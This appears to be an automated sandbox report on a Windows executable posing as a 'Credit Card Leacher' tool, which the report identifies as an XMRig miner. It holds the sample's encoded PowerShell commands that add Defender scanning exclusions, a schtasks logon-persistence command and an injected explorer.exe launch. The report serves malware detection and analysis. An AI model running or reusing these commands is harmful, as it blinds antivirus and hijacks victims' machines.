Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-12-2024 03:21

General

  • Target

    Credit Card Leacher Updated.exe

  • Size

    39.6MB

  • MD5

    1a66e85ed92c4b32a2bd9f05c618f09a

  • SHA1

    9cae80b15315271cce4e941f2e05cd7147963e21

  • SHA256

    747bdbf0fba77bf78a49dda85bfa1d595fb12468b6b8b8e89aa7dcc5fb610acd

  • SHA512

    cf6a2a8eab861572345033f1955f55c8d2ab4a477d67d1343006564434693e112f362a4c59d45524825dd6fd429fcac17132b6a964e8519bcc1d6513d09a0e95

  • SSDEEP

    49152:N7aJSKwMWHXN8K5vWXHbQbW0Bzip3iLXL47MUvu6w0BoiO9ix2NfjIfJvndZ1QUF:

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 8 IoCs
  • Executes dropped EXE 1 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Suspicious use of SetThreadContext 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Credit Card Leacher Updated.exe
    "C:\Users\Admin\AppData\Local\Temp\Credit Card Leacher Updated.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2320
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3156
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:880
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3276
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\Microsoft\services.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2368
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\Microsoft\services.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:3968
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd" cmd /c "C:\Users\Admin\Microsoft\services.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4124
      • C:\Users\Admin\Microsoft\services.exe
        C:\Users\Admin\Microsoft\services.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1392
        • C:\Windows\system32\cmd.exe
          "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3392
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:624
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2256
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe rgzpgjdhvtrpdhhm0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPB/QqEHKsc9yzR1WCQJ7J8y4FJYAp32SMQk+tLqNtiHL0PjBuVZABQ5ukZR7e0SRfX4xEoiLmw1vlCGjE3tD9jkaW0Eb3g8xC853ExIyl3HXWE4KJSqUta4SlK9ap4/lUG7HSkPpOIdCfGQjSInh0JdS48s7Oabg9uN3CnrI68x9uM+MwDGCSH2OOWc3n3R2wFXXGQeHnv1fJecZzwkB29i7BNrwykLdw+WMPR8DFl3LhypSUf+F8CiC9ldILCynMFSmlYucQSU8v0a+LG2gPkyvi+vQ+Vp0gurA3OjTRVWoPffxhqXVSy8+sZ90fNdq3Ocr+86JU3WhmIz1dp84geiw=
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2676

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    2e907f77659a6601fcc408274894da2e

    SHA1

    9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

    SHA256

    385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

    SHA512

    34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    9c4dbbf8c99b1d5b53c11f8b59fcd96d

    SHA1

    2af0f78706ce1784c8cc821426eb87a3dd4635c3

    SHA256

    14ef4c0e61add5ffe52bb79f1072f5bdfdd6036e5118b3c04ea3c18a4e7aefc9

    SHA512

    5f25e9f928ed6e0ff780ddf201878872dd33500b3ee758158b3cc331365c966af15b2a4a7a9301d68d84242fe0acd9435afdf56b481c55f7a0b814559c62dbd7

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    6b62626c9199f4688488fc54a3c44277

    SHA1

    2ad24e90c73e200c49eab2a74bf93b2c4e357686

    SHA256

    2c4d975787bde30963988a0a87f0b02e10c695ea795896f640169491a52884b8

    SHA512

    d8856a30fe27a90d4366850313fe1f8ff61733df37e0cc49d15e3b51336d1a786f25813f90e90e894fbe4fba6352a57523f7fd0a9724f4b075a511686777459a

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wp52x1fx.sek.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\Microsoft\services.exe

    Filesize

    39.6MB

    MD5

    1a66e85ed92c4b32a2bd9f05c618f09a

    SHA1

    9cae80b15315271cce4e941f2e05cd7147963e21

    SHA256

    747bdbf0fba77bf78a49dda85bfa1d595fb12468b6b8b8e89aa7dcc5fb610acd

    SHA512

    cf6a2a8eab861572345033f1955f55c8d2ab4a477d67d1343006564434693e112f362a4c59d45524825dd6fd429fcac17132b6a964e8519bcc1d6513d09a0e95

  • memory/880-13-0x000001DA32A10000-0x000001DA32A32000-memory.dmp

    Filesize

    136KB

  • memory/2320-32-0x00007FFFFB4B3000-0x00007FFFFB4B5000-memory.dmp

    Filesize

    8KB

  • memory/2320-2-0x00007FFFFB4B0000-0x00007FFFFBF71000-memory.dmp

    Filesize

    10.8MB

  • memory/2320-5-0x00007FFFFB4B0000-0x00007FFFFBF71000-memory.dmp

    Filesize

    10.8MB

  • memory/2320-6-0x00000000030C0000-0x00000000030CA000-memory.dmp

    Filesize

    40KB

  • memory/2320-4-0x0000000003090000-0x00000000030A2000-memory.dmp

    Filesize

    72KB

  • memory/2320-0-0x00000000030E0000-0x0000000004E97000-memory.dmp

    Filesize

    29.7MB

  • memory/2320-33-0x00007FFFFB4B0000-0x00007FFFFBF71000-memory.dmp

    Filesize

    10.8MB

  • memory/2320-36-0x00007FFFFB4B0000-0x00007FFFFBF71000-memory.dmp

    Filesize

    10.8MB

  • memory/2320-3-0x00000000269C0000-0x0000000028778000-memory.dmp

    Filesize

    29.7MB

  • memory/2320-7-0x00007FFFFB4B0000-0x00007FFFFBF71000-memory.dmp

    Filesize

    10.8MB

  • memory/2320-1-0x00007FFFFB4B3000-0x00007FFFFB4B5000-memory.dmp

    Filesize

    8KB

  • memory/2676-63-0x0000000140000000-0x0000000140787000-memory.dmp

    Filesize

    7.5MB

  • memory/2676-66-0x0000000002120000-0x0000000002140000-memory.dmp

    Filesize

    128KB

  • memory/2676-65-0x0000000140000000-0x0000000140787000-memory.dmp

    Filesize

    7.5MB

  • memory/2676-70-0x0000000140000000-0x0000000140787000-memory.dmp

    Filesize

    7.5MB

  • memory/2676-71-0x0000000140000000-0x0000000140787000-memory.dmp

    Filesize

    7.5MB

  • memory/2676-69-0x0000000140000000-0x0000000140787000-memory.dmp

    Filesize

    7.5MB

  • memory/2676-68-0x0000000140000000-0x0000000140787000-memory.dmp

    Filesize

    7.5MB

  • memory/2676-67-0x0000000140000000-0x0000000140787000-memory.dmp

    Filesize

    7.5MB

  • memory/2676-72-0x0000000140000000-0x0000000140787000-memory.dmp

    Filesize

    7.5MB